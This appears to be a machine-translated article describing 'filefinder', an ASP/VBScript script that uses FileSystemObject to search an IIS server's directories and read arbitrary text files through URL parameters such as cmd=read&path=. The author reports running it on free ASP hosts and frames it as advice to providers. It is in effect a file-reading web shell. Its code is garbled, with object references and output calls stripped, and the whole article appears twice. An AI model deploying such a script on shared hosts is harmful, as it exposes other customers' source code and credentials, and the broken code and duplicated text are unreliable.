Objects are one of many com objects provided by vbscript/jscript for control. It provides very convenient access to text files and file directories, but it also poses certain threats to the data security of iis web server.
The code of filefinder is very simple, consisting of 3 functions and sequential code of about 30 lines.
The most important thing is the findfiles function, which implements traversal of a certain directory by calling it recursively and searches for these files according to a specific file extension.
function findfiles(strstartfolder, strext)
dim n
dim othisfolder
dim ofolders
dim ofiles
dim ofolder
dim ofile
'If the system administrator carefully sets the permissions of the file system, the following code will make an error
' But some directories can still be viewed, so we simply ignore the errors
on error resume next
n = 0
"<b>searching " & strstartfolder & "</b><br>"
set othisfolder = g_fs.getfolder(strstartfolder)
set ofiles =
for each ofile in ofiles
'If it is the specified file extension, output the connection guide itself, but use a different command cmd
' Here is cmd=read, that is, read out the text file with the specified physical path
if issuffix(, strext) then
"<a target=_blank href='?cmd=read&path=" & () & "'><font color='dodgerblue'>" & & "</font></a><br>"
if err = 0 then
n = n + 1
end if
end if
next
set ofolders =
for each ofolder in ofolders
n = n + findfiles(, strext)
next
findfiles = n
end function
The following code analyzes the parameters after url:
' Read out the values of each parameter
strcmd = ucase(("cmd"))
strpath = ("path")
strext = ("ext")
brawdata = ucase(("raw"))
' Default search for .asp files
if strpath = "" then
strpath = "."
end if
if strext = "" then
strext = ".asp"
end if
'Execute different codes according to different command cmd
select case strcmd
case "find"
findfiles(strpath, strext) & " file(s) found"
case "read"
if brawdata = "t" then
readtextfile(strpath)
else
"<pre>" & (readtextfile(strpath)) & "</pre>"
end if
case else
"<h3>please specify a command to execute</h3>"
end select
From the above analysis, we can see that if we have sufficient permissions, we can use filefinder to find any text file on the iis web server, and we can easily view the file content. For non-text files, it is possible to determine whether they exist and where they are located, which is sometimes extremely important for advanced hackers.
However, the prerequisite for these threats to data security is that the user executing has at least permission to read the directory and files. Since the default security setting of Windows nt server after installation is that all users can "read" directories and files, no matter iis default user iusr_servername or other users, you can read directory and file information in a sequence. Most Windows NT Server system administrators are mainly concerned about whether the system can run, and are generally unwilling to change the default directory and file permissions. After all, doing so will take a lot of risks and require many experiences. Therefore, we can use filefinder to check whether the security settings of the file system of the nt server as the web server are safe.
The author has specially set up the permissions of the file system as the iis web server, but due to lack of experience, it has led to many strange errors, such as the experiment-based nt server 4.0 used to fail to connect to the access database. These functions are normal before making file system permission changes.
For the purpose of pure research, the author also conducted experiments on the free asp space I applied for (including my personal homepage provided by csdn), and the result was that filefinder could run smoothly. However, there is no problem with the personal homepage of / applied for, which shows that this free asp homepage provider is still serious in this regard. Although domaindlx's web server runs on Windows 2000 server, the security permissions of its default file system are not very different from NT 4.0.
Due to the limited ability of the author, this is the end to discuss this issue. This article is only used to provide reference opinions to domestic asp homepage providers, hoping to be helpful to the data security of both the provider and the customer.
Attachment: If a web service is run with other similar server-side scripts, it should have the same problem no matter which platform is running.
The code of filefinder is very simple, consisting of 3 functions and sequential code of about 30 lines.
The most important thing is the findfiles function, which implements traversal of a certain directory by calling it recursively and searches for these files according to a specific file extension.
function findfiles(strstartfolder, strext)
dim n
dim othisfolder
dim ofolders
dim ofiles
dim ofolder
dim ofile
'If the system administrator carefully sets the permissions of the file system, the following code will make an error
' But some directories can still be viewed, so we simply ignore the errors
on error resume next
n = 0
"<b>searching " & strstartfolder & "</b><br>"
set othisfolder = g_fs.getfolder(strstartfolder)
set ofiles =
for each ofile in ofiles
'If it is the specified file extension, output the connection guide itself, but use a different command cmd
' Here is cmd=read, that is, read out the text file with the specified physical path
if issuffix(, strext) then
"<a target=_blank href='?cmd=read&path=" & () & "'><font color='dodgerblue'>" & & "</font></a><br>"
if err = 0 then
n = n + 1
end if
end if
next
set ofolders =
for each ofolder in ofolders
n = n + findfiles(, strext)
next
findfiles = n
end function
The following code analyzes the parameters after url:
' Read out the values of each parameter
strcmd = ucase(("cmd"))
strpath = ("path")
strext = ("ext")
brawdata = ucase(("raw"))
' Default search for .asp files
if strpath = "" then
strpath = "."
end if
if strext = "" then
strext = ".asp"
end if
'Execute different codes according to different command cmd
select case strcmd
case "find"
findfiles(strpath, strext) & " file(s) found"
case "read"
if brawdata = "t" then
readtextfile(strpath)
else
"<pre>" & (readtextfile(strpath)) & "</pre>"
end if
case else
"<h3>please specify a command to execute</h3>"
end select
From the above analysis, we can see that if we have sufficient permissions, we can use filefinder to find any text file on the iis web server, and we can easily view the file content. For non-text files, it is possible to determine whether they exist and where they are located, which is sometimes extremely important for advanced hackers.
However, the prerequisite for these threats to data security is that the user executing has at least permission to read the directory and files. Since the default security setting of Windows nt server after installation is that all users can "read" directories and files, no matter iis default user iusr_servername or other users, you can read directory and file information in a sequence. Most Windows NT Server system administrators are mainly concerned about whether the system can run, and are generally unwilling to change the default directory and file permissions. After all, doing so will take a lot of risks and require many experiences. Therefore, we can use filefinder to check whether the security settings of the file system of the nt server as the web server are safe.
The author has specially set up the permissions of the file system as the iis web server, but due to lack of experience, it has led to many strange errors, such as the experiment-based nt server 4.0 used to fail to connect to the access database. These functions are normal before making file system permission changes.
For the purpose of pure research, the author also conducted experiments on the free asp space I applied for (including my personal homepage provided by csdn), and the result was that filefinder could run smoothly. However, there is no problem with the personal homepage of / applied for, which shows that this free asp homepage provider is still serious in this regard. Although domaindlx's web server runs on Windows 2000 server, the security permissions of its default file system are not very different from NT 4.0.
Due to the limited ability of the author, this is the end to discuss this issue. This article is only used to provide reference opinions to domestic asp homepage providers, hoping to be helpful to the data security of both the provider and the customer.
Attachment: If a web service is run with other similar server-side scripts, it should have the same problem no matter which platform is running.